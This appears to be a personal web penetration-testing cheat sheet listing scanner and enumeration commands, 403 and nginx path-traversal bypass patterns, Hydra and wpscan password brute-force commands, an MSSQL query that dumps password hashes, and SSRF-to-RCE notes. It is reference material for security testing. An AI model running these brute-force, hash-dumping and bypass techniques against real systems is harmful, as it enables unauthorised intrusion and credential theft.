skywhi@dreamland:/var/log$ _

Web stuff

Table of Content

General Scanners

Nuclei

Before running projectdiscovery's nuclei it is highly recommended to update the templates and select the relevant ones to avoid unnecessary requests. 

$ nuclei -update-directory /path/to/all_templates
$ nuclei -update-templates
$ cp -r /path/to/all_templates/{choose,your,templates} /tmp/nuclei_templates
$ # Run nuclei with GNU parallel (tip from https://twitter.com/PaulWebSec)
$ cat urls.txt | parallel --colsep '/' --jobs 10 nuclei -silent -nc \
                          -templates /tmp/nuclei_templates -o results/{3}.txt -target {1}//{3}

Enumeration

Directory busting

ffuf

gobuster

gobuster dir -edk -u <url> -w <wordlist> -o <output file>
grep -E 'Status: (200|301|302)' <output file>

Extract remote git repositories

Use GitTools: 

./Dumper/gitdumper.sh <url>.git/ /tmp/lulz

Authentication Issues

Bypass "403 Forbidden"

Confusion through HTTP headers: 

GET /admin HTTP/1.1
Host: target.com
==> 403 Forbidden

GET /admin HTTP/1.1
X-Original-URL: /admin
Host: target.com
==> 200 OK

Fuzz the url: 

target.com/admin ==> 403 Forbidden
target.com/%2e/admin ==> 200 OK
target.com/./admin ==> 200 OK
target.com/admin/ ==> 200 OK
target.com/admin/%2e ==> 200 OK
target.com/admin/. ==> 200 OK
target.com/admin/* ==> 200 OK

if target.com/admin/core ==> 403 Forbidden
and target.com/admin/page ==> 200 OK
then try target.com/admin/page/;core ==> 200 OK

Auth bruteforce

Hydra is pretty versatile, it supports HTTP basic/digest authentication, GET/POST forms and much more (cheatsheet here): 

$ hydra -h
$ hydra -t 30 -f -o hydra.txt -L users.txt -P passwd.txt \
  -s 80 192.168.1.1 http-get /
$ # ^C to interrupt current session, creates a ./hydra.restore file
$ hydra -R # resume session

CORS

Resources:

XSS

Resources:

SSRF

If you find a SSRF possiblity, then you should try to use the gopher protocol to escalate it further to RCE (check-out Gopherus to craft payloads). This bug bounty report by Leeroy Jenkins shows how to hit internal firewall-protected targets via a blind SSRF with a 302 redirect trick. He then uses the gopher protocol to finally achieve RCE on a local redis server.

Request Smuggling

Resources:

Frameworks / CMS

Django

Flask

Use Flask-Unsign to read, forge or crack session tokens generated by Flask.

Spring-boot

Look for /heapdump, /env, /trace endpoints, they can contain sensitive information.

Symphony

RCE is possible via ESI fragments, check Hacktricks on Symphony (mirror of Ambionics.io).

Tomcat

Tomcat + NGINX: 

https://test.example.com/manager/html => 404
https://test.example.com/foo/..;/manager/html => 200

Intercept HTTP Traffic

Browsers

I leave this here because I always look for the proxy settings on chromium and never seem to find them. Start chromium from the command line with chromium --proxy-server=127.0.0.1:8080.

FoxyProxy is a handy add-on for firefox and chromium to change proxy settings on-the-fly.

CLI applications

First check out ROPNOP's post on intercepting HTTP(S) traffic from CLI-tools.

Environment variables

Some programs like curl and wget will look for specific environment variables (case sensitive) and use them as proxy settings. Either check the documentation/source of the tool if possible or just set: 

$ my_proxy="127.0.0.1:8080"
$ export HTTP_PROXY="$my_proxy" http_proxy="$my_proxy" HTTPS_PROXY="$my_proxy" https_proxy="$my_proxy"
$ # run some tools, intercept requests and responses in the proxy
$ unset HTTP_PROXY http_proxy HTTPS_PROXY https_proxy

SQL Injections

MSSQL

Retrieve user hashes: 

select name,master.sys.fn_sqlvarbasetostr(password_hash) from master.sys.sql_logins

GraphQL

Tools of the trade

Introspection

Run the following introspection query to retrieve information about the schema and objects. The response can directly be copied into GraphQL Voyager (Change Schema -> Introspection) for visualisation. 

query IntrospectionQuery {
    __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
    types { ...FullType }
    directives {
        name description locations
        args { ...InputValue }}}}

fragment FullType on __Type {
    kind name description

    fields(includeDeprecated: true) {
    name description
    args { ...InputValue }
    type { ...TypeRef }
    isDeprecated deprecationReason }

    inputFields { ...InputValue }
    interfaces { ...TypeRef }

    enumValues(includeDeprecated: true) {
    name description isDeprecated deprecationReason }

    possibleTypes { ...TypeRef }}

fragment InputValue on __InputValue {
    name description
    type { ...TypeRef }
    defaultValue }

fragment TypeRef on __Type {
    kind name ofType {
    kind name ofType {
        kind name ofType {
        kind name ofType {
            kind name ofType {
            kind name ofType {
                kind name ofType {
                kind name }}}}}}}}

Alternatively, use InQL to run introspection queries and get the results as JSON, HTML and more.

Searching for a path

Use graphql-path-enum to check which queries lead to some TargetObject, the full schema is required. 

graphql-path-enum -i ./schema.json -t TargetObject

Web Servers

Nginx

Off-By-One Slash

This happens when the trailing slash is omitted in the nginx.conf file. As in the following example: 

location /foobar {
 alias /var/www/foobar/;
}

Then a request to https://www.example.com/foobar../new_path/file.html will effectively be translated to https://www.example.com/new_path/file.html.

While auditing a Nginx configuration, always ensure that trailing slashes are appended in configurations containing an "alias" directive.

Missing root location

This default configuration doesn't specify a location for the server's root directory: 

server {
        root /etc/nginx;

        location /hello.txt {
                try_files $uri $uri/ =404;
                proxy_pass http://127.0.0.1:8080/;
        }
}

The root directory here is /etc/nginx, yet there is no "location" directive associated with /. This means that requests to /etc/nginx/nginx.conf, for example, are possible.

SSRF and proxy_pass bypass

The following feature, abusing placeholders / variables and the "proxy_pass" directive can be used to perform requests to arbitrary locations. 

server {
  server_name localhost;

  location ~ /proxy/(.*)/(.*)$ {
    proxy_pass http://$1/$2;
  }
}

Some locations could be protected by IP address whitelisting: 

location /secrets/ {
    allow 127.0.0.1;
    deny all;
    autoindex on;
    alias /var/www/app/secrets/;
}

Then, try to use services like nip.io or rebinder to resolve to the correct private IP address.

Tools

  • Gixy: tool to analyze Nginx configurations.
  • Nginxpwner: look for common Nginx misconfigurations and vulnerabilities.
  • Kyubi: discover Nginx alias traversal misconfigurations.

Resources

Misc

Apache James 2.3.2 RCE

Fuzz through NTLM authentication

Use JavaScript XHR to fuzz websites that authenticate with NTLM on every single request. This avoids having to manually deal with the authentication process by simply running the JS in the browser console while being already logged in on the target. 

// Update me !
var baseurl = "https://www.example.com";
var method = "GET";
var wordlist = ["super", "secret", "paths"];

for (var i=0; i < wordlist.length; i++) {

  var xhr = new XMLHttpRequest();
  var url = baseurl + '/' + wordlist[i];

  xhr.open(method, url);
  xhr.send("");
  if (xhr.status == 200) {
    console.log(url);
  }
}

Enumerating VHOSTs (Virtual Hosts)

ffuf -u 'http://example.com' -H 'Host: FUZZ.example.com' -w subdomains.txt -o vhosts.txt

Wordpress

Enumeration with wpscan: 

wpscan --detection-mode aggressive --interesting-findings-detection aggressive --plugins-detection aggressive -e ap,at,tt,cb,dbe --rua -o wpscan.txt --url 'https://www.example.com'

Brute-force login credentials: 

wpscan -U admin --passwords rockyou.txt --url 'https://www.example.com'

Webshells

Top of the page - Sitemap -